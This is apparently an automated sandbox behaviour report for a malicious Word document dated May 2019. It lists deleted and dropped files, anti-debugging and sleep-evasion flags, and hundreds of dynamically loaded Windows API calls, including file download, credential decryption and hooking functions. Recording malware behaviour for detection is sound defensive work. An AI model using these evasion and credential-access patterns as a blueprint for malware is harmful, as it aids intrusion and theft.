DeletedFile: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{7531C625-7656-11E9-A15D-000C29BA3DA7}.dat
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{7531C624-7656-11E9-A15D-000C29BA3DA7}.dat
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\R8OP9ZJC\INC_655521240103US_May_14_2019[1].doc
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\47E14D8D.wmf
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Schemas\MS Word_restart.xml
DeletedFile: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\security.config.cch.308.14888764
DeletedFile: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\enterprisesec.config.cch.308.14888764
DeletedFile: C:\Users\user\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\64bit\security.config.cch.308.14888764
DeletedFile: C:\Windows\SysWOW64\dafpanes.exe
DeletedFile: C:\Windows\SysWOW64\gluerel.exe:Zone.Identifier
Guard pages use detected - possible anti-debugging.
A process attempted to delay the analysis task.
Process: WINWORD.EXE tried to sleep 601 seconds, actually delayed analysis time by 0 seconds
Process: OSPPSVC.EXE tried to sleep 300 seconds, actually delayed analysis time by 0 seconds
Process: splwow64.exe tried to sleep 1680 seconds, actually delayed analysis time by 0 seconds
Process: WmiPrvSE.exe tried to sleep 540 seconds, actually delayed analysis time by 0 seconds
Dynamic (imported) function loading detected
DynamicLoader: iphlpapi.DLL/GetAdaptersAddresses
DynamicLoader: DHCPCSVC.DLL/DhcpRequestParams
DynamicLoader: comctl32.dll/LoadIconWithScaleDown
DynamicLoader: IEUI.dll/InitGadgets
DynamicLoader: ieproxy.dll/DllGetClassObject
DynamicLoader: ieproxy.dll/DllCanUnloadNow
DynamicLoader: ole32.dll/CoGetClassObject
DynamicLoader: ole32.dll/CoGetMarshalSizeMax
DynamicLoader: ole32.dll/CoMarshalInterface
DynamicLoader: ole32.dll/CoUnmarshalInterface
DynamicLoader: ole32.dll/StringFromIID
DynamicLoader: ole32.dll/CoGetPSClsid
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: ole32.dll/CoReleaseMarshalData
DynamicLoader: ole32.dll/DcomChannelSetHResult
DynamicLoader: ole32.dll/CoInitializeEx
DynamicLoader: propsys.dll/PSGetPropertyKeyFromName
DynamicLoader: USER32.dll/MsgWaitForMultipleObjectsEx
DynamicLoader: UxTheme.dll/OpenThemeData
DynamicLoader: comctl32.dll/
DynamicLoader: UxTheme.dll/IsAppThemed
DynamicLoader: comctl32.dll/ImageList_LoadImageW
DynamicLoader: comctl32.dll/ImageList_GetIconSize
DynamicLoader: UxTheme.dll/IsCompositionActive
DynamicLoader: UxTheme.dll/SetWindowTheme
DynamicLoader: UxTheme.dll/OpenThemeData
DynamicLoader: comctl32.dll/ImageList_Create
DynamicLoader: comctl32.dll/ImageList_ReplaceIcon
DynamicLoader: OLEAUT32.dll/
DynamicLoader: comctl32.dll/ImageList_AddMasked
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: IMM32.DLL/ImmIsIME
DynamicLoader: urlmon.dll/CoInternetCreateSecurityManager
DynamicLoader: MSCTF.dll/SetInputScopes2
DynamicLoader: UxTheme.dll/EnableThemeDialogTexture
DynamicLoader: urlmon.dll/
DynamicLoader: ole32.dll/CoInitializeEx
DynamicLoader: ole32.dll/CreateBindCtx
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: UxTheme.dll/IsThemeActive
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: ADVAPI32.dll/RegEnumKeyW
DynamicLoader: OLEAUT32.dll/
DynamicLoader: SETUPAPI.dll/CM_Get_Device_Interface_List_Size_ExW
DynamicLoader: ADVAPI32.dll/InitializeSecurityDescriptor
DynamicLoader: ADVAPI32.dll/SetEntriesInAclW
DynamicLoader: ADVAPI32.dll/SetSecurityDescriptorDacl
DynamicLoader: SETUPAPI.dll/CM_Get_Device_Interface_List_ExW
DynamicLoader: ADVAPI32.dll/IsTextUnicode
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: SHELL32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: ole32.dll/CoUninitialize
DynamicLoader: propsys.dll/PSCreateMemoryPropertyStore
DynamicLoader: propsys.dll/PSPropertyBag_WriteStr
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ole32.dll/PropVariantClear
DynamicLoader: OLEAUT32.dll/
DynamicLoader: propsys.dll/PSPropertyBag_WriteGUID
DynamicLoader: propsys.dll/PSPropertyBag_ReadGUID
DynamicLoader: IEUI.dll/CreateGadget
DynamicLoader: IEUI.dll/SetGadgetMessageFilter
DynamicLoader: IEUI.dll/SetGadgetStyle
DynamicLoader: IEUI.dll/SetGadgetRootInfo
DynamicLoader: xmllite.dll/CreateXmlReader
DynamicLoader: xmllite.dll/CreateXmlReaderInputWithEncodingName
DynamicLoader: ole32.dll/CoRevokeInitializeSpy
DynamicLoader: comctl32.dll/
DynamicLoader: IEUI.dll/FindStdColor
DynamicLoader: IEUI.dll/InvalidateGadget
DynamicLoader: IEUI.dll/SetGadgetParent
DynamicLoader: IEUI.dll/GetGadgetTicket
DynamicLoader: IEUI.dll/SetGadgetRect
DynamicLoader: urlmon.dll/
DynamicLoader: urlmon.dll/
DynamicLoader: kernel32.dll/GetThreadUILanguage
DynamicLoader: ole32.dll/CoInitializeEx
DynamicLoader: ole32.dll/CoUninitialize
DynamicLoader: ole32.dll/CoRegisterInitializeSpy
DynamicLoader: ole32.dll/CoRevokeInitializeSpy
DynamicLoader: SHELL32.dll/SHGetInstanceExplorer
DynamicLoader: WININET.dll/InternetSetOptionW
DynamicLoader: USER32.dll/PostMessageW
DynamicLoader: USER32.dll/PeekMessageW
DynamicLoader: USER32.dll/TranslateMessage
DynamicLoader: USER32.dll/DispatchMessageW
DynamicLoader: ole32.dll/CoMarshalInterface
DynamicLoader: RPCRT4.dll/RpcBindingToStringBindingW
DynamicLoader: RPCRT4.dll/RpcStringBindingParseW
DynamicLoader: RPCRT4.dll/RpcStringFreeW
DynamicLoader: RPCRT4.dll/I_RpcBindingInqLocalClientPID
DynamicLoader: RPCRT4.dll/RpcServerInqCallAttributesW
DynamicLoader: RPCRT4.dll/RpcImpersonateClient
DynamicLoader: RPCRT4.dll/RpcRevertToSelf
DynamicLoader: RPCRT4.dll/NdrServerCall2
DynamicLoader: RPCRT4.dll/RpcBindingInqObject
DynamicLoader: IEUI.dll/PeekMessageExW
DynamicLoader: ole32.dll/CoInitialize
DynamicLoader: ole32.dll/RegisterDragDrop
DynamicLoader: msfeeds.dll/MsfeedsCreateInstance
DynamicLoader: SHELL32.dll/SHGetSpecialFolderPathW
DynamicLoader: SHELL32.dll/
DynamicLoader: SHELL32.dll/SHGetFolderPathW
DynamicLoader: SHELL32.dll/SHCreateDirectoryExW
DynamicLoader: WININET.dll/FindFirstUrlCacheContainerW
DynamicLoader: WININET.dll/FindNextUrlCacheContainerW
DynamicLoader: WININET.dll/FindCloseUrlCache
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: MSIMG32.dll/GradientFill
DynamicLoader: GDI32.dll/GetTextExtentExPointWPri
DynamicLoader: RPCRT4.dll/RpcStringBindingComposeW
DynamicLoader: RPCRT4.dll/RpcBindingFromStringBindingW
DynamicLoader: RPCRT4.dll/RpcBindingSetAuthInfoExW
DynamicLoader: RPCRT4.dll/NdrClientCall2
DynamicLoader: USER32.dll/GetWindowLongW
DynamicLoader: USER32.dll/IsWindow
DynamicLoader: USER32.dll/SendMessageW
DynamicLoader: RPCRT4.dll/RpcBindingFree
DynamicLoader: IEUI.dll/WaitMessageEx
DynamicLoader: OLEAUT32.dll/DllGetClassObject
DynamicLoader: OLEAUT32.dll/DllCanUnloadNow
DynamicLoader: SXS.DLL/SxsOleAut32MapIIDToProxyStubCLSID
DynamicLoader: ADVAPI32.dll/RegQueryValueW
DynamicLoader: SXS.DLL/SxsOleAut32MapIIDToTLBPath
DynamicLoader: ADVAPI32.dll/RegEnumKeyW
DynamicLoader: ADVAPI32.dll/RegEnumKeyW
DynamicLoader: ADVAPI32.dll/RegOpenKeyW
DynamicLoader: ADVAPI32.dll/RegEnumKeyW
DynamicLoader: SXS.DLL/SxsOleAut32MapConfiguredClsidToReferenceClsid
DynamicLoader: SXS.DLL/SxsOleAut32RedirectTypeLibrary
DynamicLoader: propsys.dll/PSStringFromPropertyKey
DynamicLoader: propsys.dll/PSGetPropertyDescription
DynamicLoader: ole32.dll/PropVariantClear
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: propsys.dll/PropVariantToString
DynamicLoader: propsys.dll/InitPropVariantFromStringAsVector
DynamicLoader: propsys.dll/PSCoerceToCanonicalValue
DynamicLoader: USP10.dll/ScriptIsComplex
DynamicLoader: urlmon.dll/
DynamicLoader: SHELL32.dll/SHGetKnownFolderPath
DynamicLoader: urlmon.dll/
DynamicLoader: urlmon.dll/URLDownloadToFileW
DynamicLoader: urlmon.dll/CoInternetCreateSecurityManager
DynamicLoader: urlmon.dll/CoInternetCreateZoneManager
DynamicLoader: urlmon.dll/CoInternetIsFeatureEnabledForUrl
DynamicLoader: IEUI.dll/DUserPostEvent
DynamicLoader: IEUI.dll/DeleteHandle
DynamicLoader: comctl32.dll/
DynamicLoader: UxTheme.dll/BufferedPaintStopAllAnimations
DynamicLoader: UxTheme.dll/BufferedPaintUnInit
DynamicLoader: IEUI.dll/DUserFlushMessages
DynamicLoader: IEUI.dll/DUserFlushDeferredMessages
DynamicLoader: comctl32.dll/ImageList_Destroy
DynamicLoader: ole32.dll/RevokeDragDrop
DynamicLoader: ole32.dll/CoUninitialize
DynamicLoader: IEUI.dll/DisableContainerHwnd
DynamicLoader: ole32.dll/CoWaitForMultipleHandles
DynamicLoader: urlmon.dll/
DynamicLoader: urlmon.dll/
DynamicLoader: ntdll.dll/RtlDllShutdownInProgress
DynamicLoader: comctl32.dll/
DynamicLoader: LINKINFO.dll/IsValidLinkInfo
DynamicLoader: propsys.dll/
DynamicLoader: propsys.dll/PSGetNameFromPropertyKey
DynamicLoader: propsys.dll/InitVariantFromBuffer
DynamicLoader: OLEAUT32.dll/
DynamicLoader: propsys.dll/PropVariantToGUID
DynamicLoader: comctl32.dll/ImageList_GetImageCount
DynamicLoader: ole32.dll/CoUninitialize
DynamicLoader: USER32.dll/DestroyWindow
DynamicLoader: comctl32.dll/ImageList_Write
DynamicLoader: comctl32.dll/
DynamicLoader: USER32.dll/CharLowerW
DynamicLoader: CRYPTSP.dll/CryptAcquireContextW
DynamicLoader: CRYPTSP.dll/CryptCreateHash
DynamicLoader: CRYPTSP.dll/CryptHashData
DynamicLoader: CRYPTSP.dll/CryptGetHashParam
DynamicLoader: CRYPTSP.dll/CryptDestroyHash
DynamicLoader: CRYPTSP.dll/CryptReleaseContext
DynamicLoader: CRYPT32.dll/CryptUnprotectData
DynamicLoader: RPCRT4.dll/RpcStringBindingComposeW
DynamicLoader: RPCRT4.dll/RpcBindingFromStringBindingW
DynamicLoader: RPCRT4.dll/NdrClientCall2
DynamicLoader: CRYPTBASE.dll/SystemFunction041
DynamicLoader: RPCRT4.dll/RpcStringFreeW
DynamicLoader: RPCRT4.dll/RpcBindingFree
DynamicLoader: USER32.dll/PostQuitMessage
DynamicLoader: comctl32.dll/
DynamicLoader: urlmon.dll/
DynamicLoader: urlmon.dll/
DynamicLoader: USER32.dll/UnregisterClassW
DynamicLoader: RPCRT4.dll/RpcEpUnregister
DynamicLoader: RPCRT4.dll/RpcBindingVectorFree
DynamicLoader: RPCRT4.dll/RpcServerUnregisterIf
DynamicLoader: urlmon.dll/
DynamicLoader: ADVAPI32.dll/UnregisterTraceGuids
DynamicLoader: RPCRT4.dll/RpcBindingFree
DynamicLoader: OLEAUT32.dll/
DynamicLoader: CRYPTSP.dll/CryptReleaseContext
DynamicLoader: ADVAPI32.dll/EventWrite
DynamicLoader: ADVAPI32.dll/EventRegister
DynamicLoader: ADVAPI32.dll/EventUnregister
DynamicLoader: kernel32.dll/InitializeSRWLock
DynamicLoader: kernel32.dll/AcquireSRWLockExclusive
DynamicLoader: kernel32.dll/AcquireSRWLockShared
DynamicLoader: kernel32.dll/ReleaseSRWLockExclusive
DynamicLoader: kernel32.dll/ReleaseSRWLockShared
DynamicLoader: kernel32.dll/SetProcessDEPPolicy
DynamicLoader: USER32.dll/SetProcessDPIAware
DynamicLoader: SHELL32.dll/SetCurrentProcessExplicitAppUserModelID
DynamicLoader: USER32.dll/GetShellWindow
DynamicLoader: USER32.dll/GetWindowThreadProcessId
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: IEFRAME.dll/
DynamicLoader: kernel32.dll/WerSetFlags
DynamicLoader: comctl32.dll/PropertySheetW
DynamicLoader: comctl32.dll/PropertySheetA
DynamicLoader: comdlg32.dll/PageSetupDlgW
DynamicLoader: comdlg32.dll/PrintDlgW
DynamicLoader: kernel32.dll/InitializeSRWLock
DynamicLoader: kernel32.dll/AcquireSRWLockExclusive
DynamicLoader: kernel32.dll/AcquireSRWLockShared
DynamicLoader: kernel32.dll/ReleaseSRWLockExclusive
DynamicLoader: kernel32.dll/ReleaseSRWLockShared
DynamicLoader: kernel32.dll/InitializeSRWLock
DynamicLoader: kernel32.dll/AcquireSRWLockExclusive
DynamicLoader: kernel32.dll/AcquireSRWLockShared
DynamicLoader: kernel32.dll/ReleaseSRWLockExclusive
DynamicLoader: kernel32.dll/ReleaseSRWLockShared
DynamicLoader: kernel32.dll/InitializeSRWLock
DynamicLoader: kernel32.dll/AcquireSRWLockExclusive
DynamicLoader: kernel32.dll/AcquireSRWLockShared
DynamicLoader: kernel32.dll/ReleaseSRWLockExclusive
DynamicLoader: kernel32.dll/ReleaseSRWLockShared
DynamicLoader: kernel32.dll/InitializeSRWLock
DynamicLoader: kernel32.dll/AcquireSRWLockExclusive
DynamicLoader: kernel32.dll/AcquireSRWLockShared
DynamicLoader: kernel32.dll/ReleaseSRWLockExclusive
DynamicLoader: kernel32.dll/ReleaseSRWLockShared
DynamicLoader: kernel32.dll/InitializeSRWLock
DynamicLoader: kernel32.dll/AcquireSRWLockExclusive
DynamicLoader: kernel32.dll/AcquireSRWLockShared
DynamicLoader: kernel32.dll/ReleaseSRWLockExclusive
DynamicLoader: kernel32.dll/ReleaseSRWLockShared
DynamicLoader: kernel32.dll/InitializeSRWLock
DynamicLoader: kernel32.dll/AcquireSRWLockExclusive
DynamicLoader: kernel32.dll/AcquireSRWLockShared
DynamicLoader: kernel32.dll/ReleaseSRWLockExclusive
DynamicLoader: kernel32.dll/ReleaseSRWLockShared
DynamicLoader: IEShims.dll/IEShims_Initialize
DynamicLoader: kernel32.dll/VirtualProtect
DynamicLoader: USER32.dll/SetWindowsHookExW
DynamicLoader: USER32.dll/FindWindowExA
DynamicLoader: kernel32.dll/WaitForSingleObject
DynamicLoader: USER32.dll/GetWindowThreadProcessId
DynamicLoader: kernel32.dll/CreateProcessW
DynamicLoader: kernel32.dll/CreateProcessA
DynamicLoader: ADVAPI32.dll/RegQueryValueA
DynamicLoader: ntdll.dll/LdrRegisterDllNotification
DynamicLoader: ole32.dll/CoGetApartmentType
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: comctl32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: ole32.dll/CoGetMalloc
DynamicLoader: CRYPTBASE.dll/SystemFunction036
DynamicLoader: kernel32.dll/WerRegisterMemoryBlock
DynamicLoader: kernel32.dll/WerUnregisterMemoryBlock
DynamicLoader: USER32.dll/RegisterWindowMessageW
DynamicLoader: RPCRT4.dll/RpcServerUseProtseqW
DynamicLoader: RPCRT4.dll/RpcServerRegisterIfEx
DynamicLoader: RpcRtRemote.dll/I_RpcExtInitializeExtensionPoint
DynamicLoader: RPCRT4.dll/RpcServerInqBindings
DynamicLoader: RPCRT4.dll/RpcEpRegisterW
DynamicLoader: RPCRT4.dll/RpcServerListen
DynamicLoader: SHELL32.dll/SHGetInstanceExplorer
DynamicLoader: USER32.dll/RegisterClassExW
DynamicLoader: USER32.dll/CreateWindowExW
DynamicLoader: USER32.dll/DefWindowProcW
DynamicLoader: USER32.dll/SetWindowLongW
DynamicLoader: ole32.dll/CoInitializeEx
DynamicLoader: USER32.dll/MsgWaitForMultipleObjectsEx
DynamicLoader: urlmon.dll/
DynamicLoader: SHELL32.dll/SHGetFolderPathW
DynamicLoader: ADVAPI32.dll/TraceMessage
DynamicLoader: ADVAPI32.dll/TraceMessageVa
DynamicLoader: kernel32.dll/IsWow64Process
DynamicLoader: sqmapi.dll/SqmGetSession
DynamicLoader: sqmapi.dll/SqmEndSession
DynamicLoader: sqmapi.dll/SqmStartSession
DynamicLoader: sqmapi.dll/SqmStartUpload
DynamicLoader: sqmapi.dll/SqmWaitForUploadComplete
DynamicLoader: sqmapi.dll/SqmSet
DynamicLoader: sqmapi.dll/SqmSetBool
DynamicLoader: sqmapi.dll/SqmSetBits
DynamicLoader: sqmapi.dll/SqmSetString
DynamicLoader: sqmapi.dll/SqmIncrement
DynamicLoader: sqmapi.dll/SqmSetIfMax
DynamicLoader: sqmapi.dll/SqmSetIfMin
DynamicLoader: sqmapi.dll/SqmAddToAverage
DynamicLoader: sqmapi.dll/SqmAddToStreamDWord
DynamicLoader: sqmapi.dll/SqmAddToStreamString
DynamicLoader: sqmapi.dll/SqmSetAppId
DynamicLoader: sqmapi.dll/SqmSetAppVersion
DynamicLoader: sqmapi.dll/SqmSetMachineId
DynamicLoader: sqmapi.dll/SqmSetUserId
DynamicLoader: sqmapi.dll/SqmCreateNewId
DynamicLoader: sqmapi.dll/SqmReadSharedMachineId
DynamicLoader: sqmapi.dll/SqmReadSharedUserId
DynamicLoader: sqmapi.dll/SqmWriteSharedMachineId
DynamicLoader: sqmapi.dll/SqmWriteSharedUserId
DynamicLoader: sqmapi.dll/SqmIsWindowsOptedIn
DynamicLoader: ADVAPI32.dll/OpenThreadToken
DynamicLoader: ole32.dll/CoInitializeEx
DynamicLoader: ole32.dll/CreateBindCtx
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: ole32.dll/CoRegisterInitializeSpy
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: SETUPAPI.dll/CM_Get_Device_Interface_List_Size_ExW
DynamicLoader: ADVAPI32.dll/RegEnumKeyW
DynamicLoader: OLEAUT32.dll/
DynamicLoader: SETUPAPI.dll/CM_Get_Device_Interface_List_ExW
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: ADVAPI32.dll/InitializeSecurityDescriptor
DynamicLoader: ADVAPI32.dll/SetEntriesInAclW
DynamicLoader: ntmarta.dll/GetMartaExtensionInterface
DynamicLoader: ADVAPI32.dll/SetSecurityDescriptorDacl
DynamicLoader: ADVAPI32.dll/IsTextUnicode
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: SHELL32.dll/
DynamicLoader: ole32.dll/CoUninitialize
DynamicLoader: sechost.dll/ConvertSidToStringSidW
DynamicLoader: profapi.dll/
DynamicLoader: propsys.dll/PSCreateMemoryPropertyStore
DynamicLoader: propsys.dll/PSPropertyBag_WriteStr
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ole32.dll/PropVariantClear
DynamicLoader: OLEAUT32.dll/
DynamicLoader: propsys.dll/PSPropertyBag_WriteGUID
DynamicLoader: propsys.dll/PSPropertyBag_ReadGUID
DynamicLoader: RPCRT4.dll/RpcStringBindingComposeW
DynamicLoader: RPCRT4.dll/RpcBindingFromStringBindingW
DynamicLoader: RPCRT4.dll/RpcBindingSetAuthInfoExW
DynamicLoader: RPCRT4.dll/RpcStringFreeW
DynamicLoader: RPCRT4.dll/NdrClientCall2
DynamicLoader: USER32.dll/PostMessageW
DynamicLoader: USER32.dll/PeekMessageW
DynamicLoader: USER32.dll/TranslateMessage
DynamicLoader: USER32.dll/DispatchMessageW
DynamicLoader: USER32.dll/GetWindowLongW
DynamicLoader: WININET.dll/InternetSetOptionW
DynamicLoader: ole32.dll/CoUnmarshalInterface
DynamicLoader: RPCRT4.dll/RpcBindingFree
DynamicLoader: sechost.dll/LookupAccountNameLocalW
DynamicLoader: RPCRT4.dll/RpcBindingFree
DynamicLoader: ADVAPI32.dll/LookupAccountSidW
DynamicLoader: sechost.dll/LookupAccountSidLocalW
DynamicLoader: CRYPTSP.dll/CryptAcquireContextW
DynamicLoader: CRYPTSP.dll/CryptGenRandom
DynamicLoader: ole32.dll/NdrOleInitializeExtension
DynamicLoader: ole32.dll/CoGetClassObject
DynamicLoader: ole32.dll/CoGetMarshalSizeMax
DynamicLoader: ole32.dll/CoMarshalInterface
DynamicLoader: ole32.dll/CoUnmarshalInterface
DynamicLoader: ole32.dll/StringFromIID
DynamicLoader: ole32.dll/CoGetPSClsid
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: ole32.dll/CoReleaseMarshalData
DynamicLoader: ole32.dll/DcomChannelSetHResult
DynamicLoader: ieproxy.dll/DllGetClassObject
DynamicLoader: ieproxy.dll/DllCanUnloadNow
DynamicLoader: SHELL32.dll/SHChangeNotifyRegisterThread
DynamicLoader: comctl32.dll/
DynamicLoader: IEShims.dll/IEShims_SetRedirectRegistryForThread
DynamicLoader: RPCRT4.dll/RpcBindingToStringBindingW
DynamicLoader: RPCRT4.dll/RpcStringBindingParseW
DynamicLoader: RPCRT4.dll/I_RpcBindingInqLocalClientPID
DynamicLoader: RPCRT4.dll/RpcServerInqCallAttributesW
DynamicLoader: RPCRT4.dll/RpcImpersonateClient
DynamicLoader: RPCRT4.dll/RpcRevertToSelf
DynamicLoader: RPCRT4.dll/NdrServerCall2
DynamicLoader: RPCRT4.dll/RpcBindingInqObject
DynamicLoader: apphelp.dll/ApphelpCheckShellObject
DynamicLoader: urlmon.dll/CreateUri
DynamicLoader: kernel32.dll/InitializeSRWLock
DynamicLoader: kernel32.dll/AcquireSRWLockExclusive
DynamicLoader: kernel32.dll/AcquireSRWLockShared
DynamicLoader: kernel32.dll/ReleaseSRWLockExclusive
DynamicLoader: kernel32.dll/ReleaseSRWLockShared
DynamicLoader: ADVAPI32.dll/AddMandatoryAce
DynamicLoader: VERSION.dll/GetFileVersionInfoSizeW
DynamicLoader: VERSION.dll/GetFileVersionInfoW
DynamicLoader: VERSION.dll/VerQueryValueW
DynamicLoader: WININET.dll/GetUrlCacheEntryInfoW
DynamicLoader: urlmon.dll/CreateURLMonikerEx
DynamicLoader: urlmon.dll/CreateAsyncBindCtxEx
DynamicLoader: urlmon.dll/RegisterBindStatusCallback
DynamicLoader: urlmon.dll/UrlMkGetSessionOption
DynamicLoader: kernel32.dll/IsWow64Process
DynamicLoader: kernel32.dll/IsWow64Process
DynamicLoader: kernel32.dll/IsWow64Process
DynamicLoader: RASAPI32.dll/RasConnectionNotificationW
DynamicLoader: sechost.dll/NotifyServiceStatusChangeA
DynamicLoader: NLAapi.dll/NSPStartup
DynamicLoader: ole32.dll/CoInitializeEx
DynamicLoader: ADVAPI32.dll/RegDeleteTreeA
DynamicLoader: ADVAPI32.dll/RegDeleteTreeW
DynamicLoader: RPCRT4.dll/NdrClientCall2
DynamicLoader: RPCRT4.dll/RpcStringBindingComposeW
DynamicLoader: RPCRT4.dll/RpcBindingFromStringBindingW
DynamicLoader: RPCRT4.dll/RpcStringFreeW
DynamicLoader: RPCRT4.dll/RpcBindingFree
DynamicLoader: MLANG.dll/
DynamicLoader: urlmon.dll/CoInternetCreateSecurityManager
DynamicLoader: urlmon.dll/
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: iphlpapi.DLL/GetAdaptersAddresses
DynamicLoader: DHCPCSVC.DLL/DhcpRequestParams
DynamicLoader: urlmon.dll/
DynamicLoader: comctl32.dll/ImageList_Destroy
DynamicLoader: comctl32.dll/ImageList_LoadImageW
DynamicLoader: comctl32.dll/ImageList_Add
DynamicLoader: WININET.dll/GetUrlCacheEntryInfoExW
DynamicLoader: MLANG.dll/
DynamicLoader: WININET.dll/GetUrlCacheEntryInfoExA
DynamicLoader: UxTheme.dll/OpenThemeData
DynamicLoader: comctl32.dll/
DynamicLoader: UxTheme.dll/IsAppThemed
DynamicLoader: WININET.dll/InternetQueryOptionA
DynamicLoader: GDI32.dll/GetLayout
DynamicLoader: GDI32.dll/GdiRealizationInfo
DynamicLoader: GDI32.dll/FontIsLinked
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: ADVAPI32.dll/RegQueryInfoKeyW
DynamicLoader: GDI32.dll/GetTextFaceAliasW
DynamicLoader: ADVAPI32.dll/RegEnumValueW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: GDI32.dll/GetFontAssocStatus
DynamicLoader: ADVAPI32.dll/RegQueryValueExA
DynamicLoader: ADVAPI32.dll/RegEnumKeyExW
DynamicLoader: GDI32.dll/GetTextFaceAliasW
DynamicLoader: ole32.dll/CoInitialize
DynamicLoader: ole32.dll/RegisterDragDrop
DynamicLoader: UxTheme.dll/SetWindowTheme
DynamicLoader: UxTheme.dll/IsThemeActive
DynamicLoader: UxTheme.dll/OpenThemeData
DynamicLoader: GDI32.dll/GetTextExtentExPointWPri
DynamicLoader: urlmon.dll/
DynamicLoader: apphelp.dll/ApphelpCheckShellObject
DynamicLoader: kernel32.dll/FindActCtxSectionStringW
DynamicLoader: kernel32.dll/GetSystemWindowsDirectoryW
DynamicLoader: AcroIEHelper.dll/StubInit
DynamicLoader: AcroIEHelper.dll/StubSetSite
DynamicLoader: AcroIEHelper.dll/StubOnQuit
DynamicLoader: ADVAPI32.dll/RegOpenKeyExA
DynamicLoader: ADVAPI32.dll/RegEnumKeyA
DynamicLoader: ADVAPI32.dll/RegQueryValueExA
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: ADVAPI32.dll/RegEnumKeyExA
DynamicLoader: ADVAPI32.dll/RegEnumKeyExA
DynamicLoader: SHLWAPI.dll/PathFileExistsA
DynamicLoader: SHLWAPI.dll/PathFileExistsA
DynamicLoader: SHLWAPI.dll/PathFileExistsA
DynamicLoader: ADVAPI32.dll/RegEnumKeyExA
DynamicLoader: ADVAPI32.dll/RegQueryValueA
DynamicLoader: SXS.DLL/SxsOleAut32RedirectTypeLibrary
DynamicLoader: ADVAPI32.dll/RegOpenKeyW
DynamicLoader: ADVAPI32.dll/RegQueryValueW
DynamicLoader: SXS.DLL/SxsOleAut32MapConfiguredClsidToReferenceClsid
DynamicLoader: comctl32.dll/ImageList_Create
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/ImageList_AddMasked
DynamicLoader: comctl32.dll/LoadIconWithScaleDown
DynamicLoader: comctl32.dll/ImageList_ReplaceIcon
DynamicLoader: urlmon.dll/RevokeBindStatusCallback
DynamicLoader: urlmon.dll/CreateFormatEnumerator
DynamicLoader: OLEAUT32.dll/DllGetClassObject
DynamicLoader: OLEAUT32.dll/DllCanUnloadNow
DynamicLoader: urlmon.dll/CreateIUriBuilder
DynamicLoader: urlmon.dll/IntlPercentEncodeNormalize
DynamicLoader: OLEAUT32.dll/
DynamicLoader: USER32.dll/ChangeWindowMessageFilter
DynamicLoader: DWMAPI.DLL/DwmSetWindowAttribute
DynamicLoader: USER32.dll/IsWindow
DynamicLoader: USER32.dll/SendMessageW
DynamicLoader: OLEAUT32.dll/
DynamicLoader: UxTheme.dll/BufferedPaintInit
DynamicLoader: UxTheme.dll/BufferedPaintRenderAnimation
DynamicLoader: UxTheme.dll/BeginBufferedAnimation
DynamicLoader: UxTheme.dll/DrawThemeParentBackground
DynamicLoader: UxTheme.dll/EndBufferedAnimation
DynamicLoader: GDI32.dll/GdiIsMetaPrintDC
DynamicLoader: ole32.dll/CoInitializeEx
DynamicLoader: ole32.dll/CoUninitialize
DynamicLoader: ole32.dll/CoRegisterInitializeSpy
DynamicLoader: ole32.dll/CoRevokeInitializeSpy
DynamicLoader: IMM32.DLL/ImmGetContext
DynamicLoader: urlmon.dll/CoInternetCreateSecurityManager
DynamicLoader: urlmon.dll/CoInternetCreateZoneManager
DynamicLoader: urlmon.dll/CoInternetIsFeatureEnabledForUrl
DynamicLoader: VERSION.dll/GetFileVersionInfoSizeW
DynamicLoader: VERSION.dll/GetFileVersionInfoW
DynamicLoader: VERSION.dll/VerQueryValueW
DynamicLoader: urlmon.dll/QueryAssociations
DynamicLoader: SHELL32.dll/SHCreateAssociationRegistration
DynamicLoader: sechost.dll/ConvertStringSidToSidW
DynamicLoader: samcli.dll/NetUserGetLocalGroups
DynamicLoader: SAMLIB.dll/SamConnect
